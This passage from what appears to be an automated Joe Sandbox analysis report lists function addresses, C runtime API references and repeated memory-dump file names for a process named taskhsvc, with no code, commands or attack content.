    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00319D53, Relevance: 1.5, APIs: 1, Instructions: 38
    APIs
      • Part of subcall function 00319C41: abort.MSVCRT ref: 00319C9A
      • Part of subcall function 00319C41: memset.MSVCRT ref: 00319D32
      • Part of subcall function 00319C41: __stack_chk_fail.LIBSSP-0 ref: 00319D4C
    • __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 002F2194, Relevance: 1.5, APIs: 1, Instructions: 36
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 002F2219
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00326769, Relevance: 1.5, APIs: 1, Instructions: 36
    APIs
      • Part of subcall function 003265E9: strerror.MSVCRT ref: 003266A8
      • Part of subcall function 003265E9: abort.MSVCRT ref: 00326730
      • Part of subcall function 003265E9: __stack_chk_fail.LIBSSP-0 ref: 00326762
    • __stack_chk_fail.LIBSSP-0 ref: 003267D4
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C4AF9, Relevance: 1.5, APIs: 1, Instructions: 36
    APIs
      • Part of subcall function 002B3B52: __stack_chk_fail.LIBSSP-0 ref: 002B3C6E
    • __stack_chk_fail.LIBSSP-0 ref: 001C4B69
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00313207, Relevance: 1.5, APIs: 1, Instructions: 36
    APIs
    • __stack_chk_fail.LIBSSP-0 ref: 00313277
      • Part of subcall function 00312E50: abort.MSVCRT ref: 00312F7F
      • Part of subcall function 00312E50: abort.MSVCRT ref: 003131E3
      • Part of subcall function 00312E50: __stack_chk_fail.LIBSSP-0 ref: 00313200
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 0022008E, Relevance: 1.5, APIs: 1, Instructions: 35
    APIs
      • Part of subcall function 0022D5B4: memset.MSVCRT ref: 0022D62C
      • Part of subcall function 0022D5B4: strchr.MSVCRT ref: 0022D699
      • Part of subcall function 0022D5B4: strlen.MSVCRT ref: 0022D73F
      • Part of subcall function 0022D5B4: free.MSVCRT ref: 0022DB41
      • Part of subcall function 0022D5B4: free.MSVCRT ref: 0022DB91
      • Part of subcall function 0022D5B4: __stack_chk_fail.LIBSSP-0 ref: 0022DBB1
    • __stack_chk_fail.LIBSSP-0 ref: 00220115
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C38E7, Relevance: 1.5, APIs: 1, Instructions: 34
    APIs
      • Part of subcall function 00237498: __stack_chk_fail.LIBSSP-0 ref: 002374B8
      • Part of subcall function 00313207: __stack_chk_fail.LIBSSP-0 ref: 00313277
    • __stack_chk_fail.LIBSSP-0 ref: 001C39F0
      • Part of subcall function 0023AD19: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0024EF37), ref: 0023AD77
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
